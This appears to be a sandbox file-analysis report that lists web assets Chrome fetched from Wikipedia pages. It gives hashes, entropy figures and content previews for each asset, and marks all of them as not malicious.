                                        Preview:.PNG........IHDR..............q......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE...aI..y....................m..............s..........~b...................rZ........t........|.....z........s.......oW......................z_........u..............n.............RB..v.............................&...........r....C.........3.$...............v.......y..~..p........"..........m.(..!....h....q.._./......n.5.Q............'..`.N.T....(....l...G..u.8.V.....#.:.......o#{...CtRNS..e...F..z..;...V.s.0....i6..}#........gg.2....q.&....".....>....?y......bKGD.l..C....tIME......*s../....IDAT..c`..F&f.V6v.(...rvqus...y...=<..}|..@|A!g?...@/..`a...Q1.../..p.H..P......W.s...v.b....*..u..OHLJ.e..O.JMKv.....L..9.,.l..<..|..%.e.d.B."/.b..R.2U.5u...*.....z7..M-..f..B..-:...z..^..n.t....s[=....al.r....EzgWA......6.v...N.H@S.....=...&(...%tEXtdate:create.2024-06-13T00:11:42+00:00^.*}...%tEXtdate:modify.2024-06-13T00:11:42+00:00/K.....
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 220x220, Suserng: [none]x[none], YUV color, decoders should clamp
                                        Category:downloaded
                                        Size (bytes):21586
                                        Entropy (8bit):7.990735237306055
                                        Encrypted:true
                                        SSDEEP:
                                        MD5:87ED4F248CD330058C899109A233E812
                                        SHA1:FC70B0FC7495781E92BAC374B0CF293859A73548
                                        SHA-256:9F26A234446602574A3E229F4939DF8A633391D7674B2C67C40FBC484FDBC3FC
                                        SHA-512:205465EE844FFBE150C236F4EFF1DCA01EF8800AC227B4A6C396C037192BD08D90AAD5F71379F02F0D530228AE4FEC23B8B447A396B97135245B8496076419CA
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/6/65/Camp_x-ray_detainees.jpg/220px-Camp_x-ray_detainees.jpg
                                        Preview:RIFFJT..WEBPVP8 >T..P....*....>=..C"!..~.. ...[.).W.......z/......|..<.z'.w.......I.....G......g?2......?....\./....O..O._..........{?...=....X..._.....Y.......u.......~..C...?..../...?....D~;.7...G.........s.G....J....z.........?..D.{.......................K.....W......_........{.......>..........Y........toy+......Fk7....@..V.b....].?M._..p..J..m.~..........cxT....-cd..tD..CP(!..`Eq...`.?,.eE.Yj,y.V.E..i(.+.l-..+...r.w.:@.o........i.._...:@.P..<....K.R..6..^r......2.P;..,,Q..b..u.V}.....U.N@r0/&Q2.',SJ}......#....a.....<Y..,.Z,@2.A.t....6l.@bR....j%.~.l...T". ......?..<]{Pa04...Qzj...e...r.....vQ"..L...}.>...o......!zP|.rt'.A....+=5Lo/.l."....k..#..1cJ..H....(..s..%y...o..x_....../...Q.3.}.'...<.._.V..5..p......C.;.9D...T.1.(l...f..]>$l.C..$.>U.>}....j.9......e...z0.i......rQ....G.R..Ni>...k..e.M..Z...g..\.F..6?..U?.xq....2..'.2_.Q.I).p...6.......M.'S..'<....N.bR.8....k.c.V........m.e.v...\H..Pt.#..7.....K....e.\..y.S..&m.......~..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:downloaded
                                        Size (bytes):9444
                                        Entropy (8bit):3.7340369219367555
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:73C41E7C71EED318AFF4D771E9651F95
                                        SHA1:C9DEE94A4B7BD5AF094AEFB7E83325C81761A3DE
                                        SHA-256:CE4C2501F6DFE8A3492931DA471DE530244D2EF262B5B9625E32A675526D5891
                                        SHA-512:B1B61C3FB10FDDDD020097821BD243F6B2F4EFAEB49F370CBCA5C6F8C4BAE50186C7A1E313A6B14C50F88D0B9E36D9006AB3A3CE00FFFD933A9CAF40837CB37C
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://en.wikipedia.org/static/images/mobile/copyright/wikipedia-tagline-en.svg
                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 117 13"><path d="M89.777 3.326c.104 0 .17.039.17.092 0 0-.055.363-.055.832 0 .093.076.081.117.039.584-.594 1.3-.921 1.781-.921 1.33 0 2.3 1.27 2.301 2.651 0 1.05-.352 1.86-.963 2.457-.533.509-1.18.729-1.91.729-.41 0-.812-.072-1.131-.201-.133-.055-.182-.071-.182.098v1.403c0 1.08.143 1.13 1.064 1.185.078.077.078.352 0 .428-.558-.011-.96-.025-1.572-.025-.572 0-.91.014-1.455.025-.078-.078-.078-.353 0-.431.793-.038.936-.104.936-1.184V4.951c0-.74-.143-.818-.846-.885-.025-.078-.053-.285-.025-.363.896-.116 1.4-.233 1.77-.377zm-17.266.144c.078.078.078.353 0 .431-.479.039-.869.455-1.053.832-.688 1.46-1.26 2.8-2.301 5.305-.16.385-.33.757-.533 1.117-.467.834-.989.938-1.26.938-.352 0-.611-.209-.611-.48 0-.17.195-.561.572-.561.143 0 .193.039.377.039.324 0 .506-.116.648-.377.195-.402.354-.762.508-1.195.131-.363-.068-.961-.182-1.223l-1.473-3.419c-.354-.828-.459-.923-1.023-.976-.078-.078-.078-.353 0-.431.26.015.609.024 1.053.024.469 0 .988-.012 1.469
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 220x124, components 3
                                        Category:dropped
                                        Size (bytes):13102
                                        Entropy (8bit):7.837317575810905
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:B794E94E6EF399B99531741F6BBB8D55
                                        SHA1:DAB0E95496935EC7098675A92BD6DBC479E5E620
                                        SHA-256:AB77D500DD466E99AA678BA05F5F70D4112A3527886B89F963B6D5F2A410BA68
                                        SHA-512:C1BD4623D6F0B183697EB31D5B1D4F6BCA8333D3FEABC7616B30A306E9C64F770F01775D09C0A605E866E8F30688232833EE8DEBE1D5F0C459A6E0944C4DBF04
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:......JFIF.....,.,.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 10 x 10, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):435
                                        Entropy (8bit):6.199213812033718
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:817F7060B734FA600B918C42F387D82B
                                        SHA1:60A57DE53D26ABFF6D967CE867F2F5A7DE1544C3
                                        SHA-256:1D6C4E4D1FB6BAFC7C9300B842F9BC9749C799869BAD57AFFFA0A1B79C6E0636
                                        SHA-512:7CC85A0D7871E7AEDD6735F9D49F9E77908A622227A50762C53B163963797CB05935FCA05D7FAF02EA7284CBA18521F41B9AE989A9EDEE05C96CF181126F44E3
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR...............?.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...KPLTE...9c.2e.4f.3f.3g.1g.3f.2g.3f.3g.2f.-i.3f.0`.2f.3f.6k.3e.4f.5e.3e.4f.3f.....F......tRNS..[...>.\........~.D...k.r....bKGD..i......tIME..........[...BIDAT..c`..F&..`.g......s.Y..\l.<...8/H......Da1..Y..`..01...Q1........~_.j...%tEXtdate:create.2024-06-12T21:09:19+00:00T8cn...%tEXtdate:modify.2024-06-12T21:09:19+00:00%e......IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 75 x 79, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):3731
                                        Entropy (8bit):7.907999206502849
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:0E228C6F94AF27782B053087E636AF47
                                        SHA1:054CCBB8BB5729193226EDD6782486B106DDA320
                                        SHA-256:C3A6D8121B48E9DDDBB9D73CD548C641F1CE22BF8890BCED3B86C741247EF933
                                        SHA-512:C8FB62722AC82C3B975A424C3B2535D610F10D58C5E99CD997E0093034FD5E981CFF64CC4DE03B278343192CF36533FD4EDB993733094834A09D81A31C315037
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR...K...O.......8.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME......7.&......IDATx....T.u.?....!<.UT.....tU.......@.....V%...Q+?........5.xP..b....C."V..........J*.Vy<x3g...7s..{g.{0<V8k.u..9.....{.3...-..........P.Y..,`.".h.r.Q..Z......}.E....+.......4l..Q.'....7u......x.~.....(.ZZ....Ta..4.O....q.......;.V...e...>...m=I.>)3.%GOn8....Je.+xpBB..5C.CPKiS@]p....a.t.6.:2.J.Am=...Z..y]....e../....H[......{.P{....V<.I......@.8..}......3...-.N.....:......,.z..V.7.....>.qC...B.......t.{.....{....]....X....5.bd,...#......&B...../....F rg.'..g...............g.j[.H/.t.*O..Gc...`.......U.?c|....`.....r.............`W...+.w.&H.gP.Sa..V.u.. C.*].;.R8/ .._..z...zw6H.1 e.(..G.XvX`. ..T.7...2rd....?.Eu.G....H..ee...7.Gm?..C...)........Eu.XAL ..(.-nM....ed(....x..+o..1...U...-G.K.Q"....I....n...X......].}y.^.$i.E...xLN.H...i...x...c+xUA.e.j.3q..>S..n].~.._..-..X.Y..n....V..jO.Sq:w~.m...o~.F.:1ov^?
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:downloaded
                                        Size (bytes):6170
                                        Entropy (8bit):3.871426479574051
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:1C06C456C5B8075CDE3BF8A15ABE24C6
                                        SHA1:95E91EBD466CB02FD47840742A97E636539C2943
                                        SHA-256:8AF4F20833AAE458D9B370E7174ADDB8666812D8EF608348F7973BE65EED2B9B
                                        SHA-512:84E67B07487026CD3EE2DF44BFA9EED07027E3D49868392A8E256E5C15F56D9325BF70A7C618709D4653EA241586797C302CA7B865EF72E7FDD69B1E0B42CA14
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://en.wikipedia.org/static/images/mobile/copyright/wikipedia-wordmark-en.svg
                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 120 18"><path fill="#000" fill-rule="nonzero" d="m18.339 0 .199.001h.375l.174.001h.315l.138.001.323.001H20.034l.058.053v.5c0 .139-.078.208-.231.208-.753.035-.908.11-1.184.507-.15.216-.447.68-.755 1.204L15.28 7.419l-.074.154 3.23 6.611.196.054 5.088-12.076c.177-.487.15-.832-.078-1.035-.228-.197-.389-.315-.978-.34l-.477-.023a.275.275 0 0 1-.168-.061.174.174 0 0 1-.08-.147V.054l.073-.052h5.749l.058.052v.502c0 .136-.078.205-.231.205-.753.034-1.31.197-1.673.489-.362.294-.645.698-.848 1.225 0 0-1.53 3.5-3.137 7.159l-.268.61c-1.12 2.55-2.24 5.09-2.876 6.501-.613 1.17-1.22 1.06-1.745-.033-.411-.847-1.1-2.33-1.8-3.86l-.469-1.024c-.273-.6-.54-1.19-.786-1.727-1.08 2.23-2.56 5.26-3.3 6.624-.715 1.24-1.3 1.08-1.771.032-1.63-3.84-4.97-10.6-6.539-14.35-.29-.697-.51-1.14-.716-1.32C1.45.914 1.019.808.36.774.121.747.001.688 0 .593V.067L.058.016.592.014H1.6l.969-.001h.253l1.734.001h.225l.95.001h.577l.058.052v.5c0 .139-.087.206-.26.206L5.454.8c-.56.023-
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):1993
                                        Entropy (8bit):7.828660005708476
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:4528F46AD00F029BFFD8B63F775B6C0E
                                        SHA1:4B7A14E281BD627C6E7C33062133413228D1FF98
                                        SHA-256:CF90878EF4089E77FB2E450B8971720ED938927ED54E0DBAA2D0A5F3684C0A04
                                        SHA-512:6AB9A0B2246CD4C2208402695E9A79D28127EC7B8F36EF2F68BE570D4746125409BC1878D86F43B9A8D2847AAEA629B53765A81F9AB6F740A9A5057279DC5A26
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR...(...(........m....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME......2@.(.....IDATX...ip....._...d..`"..DH"....W.K.X....R....!mG.N[.A......;c..X..:P. ...X. D..B.i. .....Y..i..O.=......{.../.8.....N..N...5x...d.d>....A....})..S8.K?..^..-.O....r.....F.ri~.O..-.....<....v...2.>.v.O.A....\J....t....r..7.r>s...r.9v..L....7..q..b.......?...:....L..0.d...}."Z.s..D$.w-..|..s."2....r.+.>...G.YL.r.....5..../._.`..>..F.n.Xb..ne.>TGD2..q..D/.z.;v..HT..oQ4.d.;....G...R._.............z.oc.g'.%.>.l`..<|..`6.Q.C....._D.E...Y..'.C(.)......j.=B..|z5#..(.?..e.oYXFAZ.....1N;.B.....*..wZ..6P. ....8c. .J~...!......?.....k.v|<...E...[.7.:..]l\FH&1...3;...........-..;...8....?+...f..dD..3..B...._.y..:n.......M.E..bn^?........U.]..cg.e:..}r9..rO."....Y.].....f.d.#8Z..S)../Np.rZk.....Z.....'j8.;.Zr.....<...<^.F.Gl....Nb.....4"C..O.3.o....@.1.....9..6.@*.....9...+....?.nB..)'$....d.9..{-....&..I..x..X..:..\
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):178
                                        Entropy (8bit):6.7057410150902
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:15BD68F3434CBFCFC6136DDD98607ED8
                                        SHA1:B85F9759687C2DE5368DDAEF5AFCCFFD5799B758
                                        SHA-256:A3DB12EC65E55D23A63ABDE45FB1D2339F0115A6031A9AE3FFA328F1EE5C6D82
                                        SHA-512:7A79892D234D64A2232239388E3DA31E8A7EDE91657DEC98F543295F3579886C46F9AC1C04C47BA66B83230D07CBE46B5F2C2FD16FD2E53CF4BD92E32ED8ACC7
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/en/thumb/8/8a/OOjs_UI_icon_edit-ltr-progressive.svg/10px-OOjs_UI_icon_edit-ltr-progressive.svg.png
                                        Preview:RIFF....WEBPVP8L..../.@.....m#.s..\...W..#.P.%.....HR...o.9.H............]&..f...p.....Y>.*.P.Q..h.p....m....`.H....g...ZICD..m........*G..Q.w...l@.E...\".....x.Q..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 16 x 16, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):225
                                        Entropy (8bit):5.864289913439467
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:7A0E6EBB7CB8E20C41E31F22A06B9A06
                                        SHA1:A294F2E10FEEDA56426788F1A140916E6EABDB1B
                                        SHA-256:A524EF7507020B455C32F5ED4CFC65A13A047C432B3000477443FF23502575A5
                                        SHA-512:D0B9D3F93A8022AE95BF07EC580176BEE49A5C51FBD3144BDD2F32AB5FFC5628C5CEF5528AD20D4EDB4C3A46644E61E25A80A80326A1778F3D7EC4147B444C55
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR.............(-.S....sRGB.........gAMA......a.....PLTE.......*'...............tRNS..............pHYs..........o.d...FIDAT(Sm.K.. .EQ......)..89HDB.X..T0i.....V...u........_.U......1@M......."".....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 220x279, Suserng: [none]x[none], YUV color, decoders should clamp
                                        Category:downloaded
                                        Size (bytes):27046
                                        Entropy (8bit):7.9921900847085565
                                        Encrypted:true
                                        SSDEEP:
                                        MD5:68C55EA1F7B6F35DACA368ED3A7B5563
                                        SHA1:A6A3A6F97A4184FC3B811F59CDF3BFB2CFFF42FA
                                        SHA-256:CABAEFCFAE0D8659B4BA7D21F39269B9F0A8DF2149D6BF0E93EA904DCA26EF80
                                        SHA-512:3B5D1AF63FB481BB9548AE1BCC16DA0686D6A849BE3A96DDC3A9067EF8DD91867FE7782D8DA99E795470525F2A7E8A0C9BE7D28E05372F524D172E9FA2FC36FF
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/6/6c/Declaration_of_the_Rights_of_Man_and_of_the_Citizen_in_1789.jpg/220px-Declaration_of_the_Rights_of_Man_and_of_the_Citizen_in_1789.jpg
                                        Preview:RIFF.i..WEBPVP8 .i.......*....>A..C"...-..(.....r.....K.....7~c..@u....|....oX.......f.9...W._.>..............+./S..............?q>.<.?..ti.....'.....p..{Q...?.........................G....?t..|..U.........?..7....^...+../..A.1.......>....+...?..w...[..........=..O.k........|..-.............?....s.c........~....9...O./.O...Y....~.......-...6:....In.Y.......d\..ba......c.dH...>.....jZ...$../.....em....2su.%j....G.D./..SnI:...##.P.......#\$....yTK....y...>d....U......mI9...V.......^..w.=.....+.Ox.....z..'.I6..IIn%..U..........l.r...F]....l.`u..=.-...,.....5.....L..Yk........E..'6yjl9T.&.G...X....d....@L.E-:v7|.L{.Y..Z.<}.f....#t....Q...I..n.k....2R.#.,...8.Z6..\.'6....NI.;o..#|.$..H:H8e..#........'YX7t6^\L..3.....4R.........Q.*].O......e..OZ.qD.(?.j..)..W.i... 87u'...rKHz.R>..=..=..m.X.=...v2.m.J.X...4w.X..W?*.M.5s.3..o....].eH...Vb#.M........*..v....Z.*.p`...2....K./lOYX......0...n..A.,.\.G........>..9..^..H\..Haq.V.Yk.r...b...>..x..Y
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:downloaded
                                        Size (bytes):16
                                        Entropy (8bit):3.625
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:38A780A62EB546B092D3971D9726933B
                                        SHA1:F15AACF2D1BA86B4DD0B5CC3E57BF495E164BE4A
                                        SHA-256:7A6B42A6EC883D930C8A77A49297D5C082D056B5DAB7F9B83F259D3680525291
                                        SHA-512:802152CD0E703EBE9E67CFDC9540A6C508BC253FFE62FC4AC68227F7A24CDC9AC6019CCB0EA0C7937FD63C7CB1154309C93F0B3E6AB4AAFD1FE995B08107E3F3
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkdhT3pgHiGmBIFDULauvc=?alt=proto
                                        Preview:CgkKBw1C2rr3GgA=
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (17570)
                                        Category:downloaded
                                        Size (bytes):123514
                                        Entropy (8bit):5.408633207288442
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D259947D38A834DC4C17F1BFEE1F596C
                                        SHA1:6113ED1DFFDF111706F3DAEC25C8776E57C4F1B6
                                        SHA-256:5AEED06B03F1136A68ED9F2FBAAB386D00085DD2A5BEF75180C32E353CD7651E
                                        SHA-512:4B8ABD56B3E34C5AC92DB005D859E1AECE27A0E96944013B079C2390C57948D55E45745E86A43C9EBC31D1A2250B44441899E72E1C9274BF10F2D936F9E380D4
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.referencePreviews%7Cext.math.popup%7Cext.popups.main&skin=vector-2022&version=iyb3c
                                        Preview:mw.loader.impl(function(){return["ext.cite.referencePreviews@uhodf",{"main":"index.js","files":{"index.js":function(require,module,exports){const isReferencePreviewsEnabled=require('./isReferencePreviewsEnabled.js');const{initReferencePreviewsInstrumentation,LOGGING_SCHEMA}=require('./referencePreviewsInstrumentation.js');const createReferenceGateway=require('./createReferenceGateway.js');const renderFn=require('./createReferencePreview.js');const{TYPE_REFERENCE,FETCH_DELAY_REFERENCE_TYPE}=require('./constants.js');const referencePreviewsState=isReferencePreviewsEnabled(mw.user,mw.popups.isEnabled,mw.config);const gateway=createReferenceGateway();mw.config.set('wgCiteReferencePreviewsVisible',!!referencePreviewsState);mw.trackSubscribe('Popups.SettingChange',(data)=>{if(data.previewType===TYPE_REFERENCE){mw.track(LOGGING_SCHEMA,data);}});module.exports=referencePreviewsState!==null?{type:TYPE_REFERENCE,selector:'#mw-content-text .reference a[ href*="#" ]',delay:FETCH_DELAY_REFERENCE_TY
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):2267
                                        Entropy (8bit):5.127298385412949
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8E4E567E80EB35913566380CB6B6A313
                                        SHA1:902F6A91149E59C3EEC8FAA7CA267B97C9D0BD53
                                        SHA-256:93C3AEA7D5B9E0994219304672CE7525DCF8B5AE86CD886345B9E524B0E6A065
                                        SHA-512:800F529CEAA442B0414FF7A47D877D5EBE4C262A4A999A1E7D6A3410BEE66D24819078D1E08E94EA4DDFCCF6ECC6C8A0D4DD306ED8369212A0FAC84C51DDB870
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:{"type":"standard","title":"Francis Hutcheson (philosopher)","displaytitle":"<span class=\"mw-page-title-main\">Francis Hutcheson (philosopher)</span>","namespace":{"id":0,"text":""},"wikibase_item":"Q316367","titles":{"canonical":"Francis_Hutcheson_(philosopher)","normalized":"Francis Hutcheson (philosopher)","display":"<span class=\"mw-page-title-main\">Francis Hutcheson (philosopher)</span>"},"pageid":188405,"thumbnail":{"source":"https://upload.wikimedia.org/wikipedia/commons/thumb/1/16/Francis_Hutcheson_b1694.jpg/320px-Francis_Hutcheson_b1694.jpg","width":320,"height":422},"originalimage":{"source":"https://upload.wikimedia.org/wikipedia/commons/1/16/Francis_Hutcheson_b1694.jpg","width":758,"height":1000},"lang":"en","dir":"ltr","revision":"1247676177","tid":"ed319369-7b2c-11ef-ad68-e689bdaed317","timestamp":"2024-09-25T10:57:16Z","description":"Scottish philosopher (1694.1746)","description_source":"local","content_urls":{"desktop":{"page":"https://en.wikipedia.org/wiki/Francis
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (4499)
                                        Category:dropped
                                        Size (bytes):22854
                                        Entropy (8bit):5.371346641132087
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:B66F77C59FDF6F35CEF8617041C9C0F3
                                        SHA1:2CBD80D680048EFCAC6AD14E53C192CD1BE52D38
                                        SHA-256:726E302E3D459F58A5D5612EA6348326D18C3ED7F63D757CF5A1B482A5B36FF5
                                        SHA-512:64BEA68D6CB0BE5245124DCF77ECD4E262FA4F04C8897F893F3C461E3990049066C9146B1B9DC6E2AA249FF1C4E8C4BC6864D6A8104EB457A840C3022DC071BD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:mw.loader.impl(function(){return["ext.gadget.ReferenceTooltips@dl4y1",function($,jQuery,require,module){(function(){var REF_LINK_SELECTOR=window.rt_REF_LINK_SELECTOR||'.reference, a[href^="#CITEREF"]',COMMENTED_TEXT_CLASS=window.rt_COMMENTED_TEXT_CLASS||'rt-commentedText',COMMENTED_TEXT_SELECTOR=(window.rt_COMMENTED_TEXT_SELECTOR||(COMMENTED_TEXT_CLASS?'.'+COMMENTED_TEXT_CLASS+', ':'')+'abbr[title]');if(mw.messages.get('rt-settings')===null){mw.messages.set({'rt-settings':'Reference Tooltips settings','rt-enable-footer':'Enable Reference Tooltips','rt-settings-title':'Reference Tooltips','rt-save':'Save','rt-enable':'Enable Reference Tooltips','rt-activationMethod':'Show a tooltip when I\'m','rt-hovering':'hovering a reference','rt-clicking':'clicking a reference','rt-delay':'Delay before the tooltip appears (in milliseconds)','rt-tooltipsForComments':'Show the tooltip over <span title="Tooltip example" class="'+(COMMENTED_TEXT_CLASS||'rt-commentedText')+.'" style="border-bottom: 1px d
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 40 x 39, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):1508
                                        Entropy (8bit):7.23759469113956
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6ACEFF64CF127A7029CD91CC51D2C0A4
                                        SHA1:99C94BDFD8FB4DF827FC182A0D8ACFE3A0C68283
                                        SHA-256:9FF7A4EFC36B67C2B6F67AC4BF35CF9B29CFEEAF07E44E96B9B8EFBB21019E49
                                        SHA-512:027687CB9FC5B8D85F6BE0DF4F29BFEDF50CA7C5362FAF32AB7613D2B89BF592B83AC609F0920980B6AAD9AD260507DA58595095D2F8ECBEEAAEFAA358BC0BF1
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR...(...'.....Jv......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...4PLTE..............................................00.//....00.00.11.......00.//..........11.++.$$.......00.11.00....@@.UU.......00.11.....................................................................UU.Oj.Oj.Pj.Pi.Oj.ff.Qk.Oj.Pj.Pk.Ft.Qj.Mf.Uc.Pj..11.00.00Qk.Qj.Pj.Oj.Pk.Pj.Pj.Qj.Pj.Pj.Pi.Pk.Pj.Pk.Pj.Nb.Qh.Pj..11.00.11.//.00Pi.Pi.Qk.Pj.Pp.Pj.Pj.Ml.Pi.Pj.Pj.Qk.]].Pj.Lh....Ok..//.//Qi.Im.Ok.Pj.Pi.UU.Im.Pi.Oj.Ni.Pj.Pj.Qj.Pj.Pj.Oj.Oj.Pj.Qm.Ki.Nl.Pj.Oi.Qm.Pk.Pj.Pj.Mk.Pj.Rl..00.00Pk.Pj.Qj.Qi.Qi.Pk.Ni.Rj.``.@..Ph.Nh.Qh..11.00.//Rk.Pi.Rk..33.00.00.00.00.11....00Pj.......i....tRNS.....w........|...}|x...zv.....vx:t....u9r....... af."..sn...,e+....:.u.......N..LH...`..Y...]....Y.]..\.X....!f.b....Q.\r...m......l...../...wbV..+.;..p.{U..'5..61,.[Q.32#fZK..H,......bKGD..wL....tIME.....3.-..y....IDAT8...[LQ..........5.Q..He..A.QL...1.R...ia..qm..|.:..t\F..'....}..<..&.@&.p....I.z&.0.#.z
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):1010
                                        Entropy (8bit):7.768674261084528
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:F32919132F1DC2EFF2A2712791B9ABD9
                                        SHA1:1751699694C409F9263B61E04FE2EE6288B94396
                                        SHA-256:FFAD4EAEE2953D9F92659768C7DD6334FF2FE097C6B2DE273283B916F49FA355
                                        SHA-512:359004DDA068ACFBF9FF6CD32C0E5432BD2FCDAF22ECC658ADA585C426C71CF20398AB7117543C276DBB7358034239B4A3407AF8C5D71CF9347EDF0FDC5F41D4
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/5/56/Emojione_1F6AB.svg/70px-Emojione_1F6AB.svg.png
                                        Preview:RIFF....WEBPVP8L..../E@....(.l'...7Da...D..<..H..){O.=zn...}..J.$Ua.m.ze......Y.4.z.p7.G..h.&.`rBz.Q"m...9.F........wn..V..SW...T....C."........|*P..B. .....5..ID.M.......T.L"..gX....M.WH.._.IF..$....I{.. ........._.q.p.%Z".S..u.S..F.w....1$)k[..Z.m.m{w..3IU......j#9....6.../..R............0.?.....g.....W.PRB....i..P....n.9BS./..~..5.hs..X.z..yA......e.iji.-..*......X.7...`.4T.A....F...|.Pf..,9[pi...O%.7.T...2.....3... Yv...j.|'.F.k..:..Pd..h..C..&.....X.V.Q..H<\;>.I7..bG..[..t{T.) ..U..c...s..w.s...w.."z./.9...'...%...0..W...o.F[.q.]W.1....g...:i.`|.....d.9.#.C.^...:y.,..p...9. ?.oy..t...f.a...`...1...f.....iqR..;.n.".i..I...;.-.?+.... .."%..cB.....m`..{........W...0...e.1..F$_&..H.....<9.......1..Ks&.F>k<..o.Y.[>....l.'f0..t..<.2.Z..../..S0.........%]....H..U..O...*...G.+.)..[@...*...;.......>.u.Ls.r...m.*...U.5b. U|....6.....-U.V.d....L.]..Af!J......L..{.E.;*..Qq[......~..lZ....3x.8.].4s....:..%..x.wZ.C....z..Fb...xe........@..q.9..RW..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (47261)
                                        Category:downloaded
                                        Size (bytes):47262
                                        Entropy (8bit):5.3974731018213795
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                        SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                        SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                        SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js
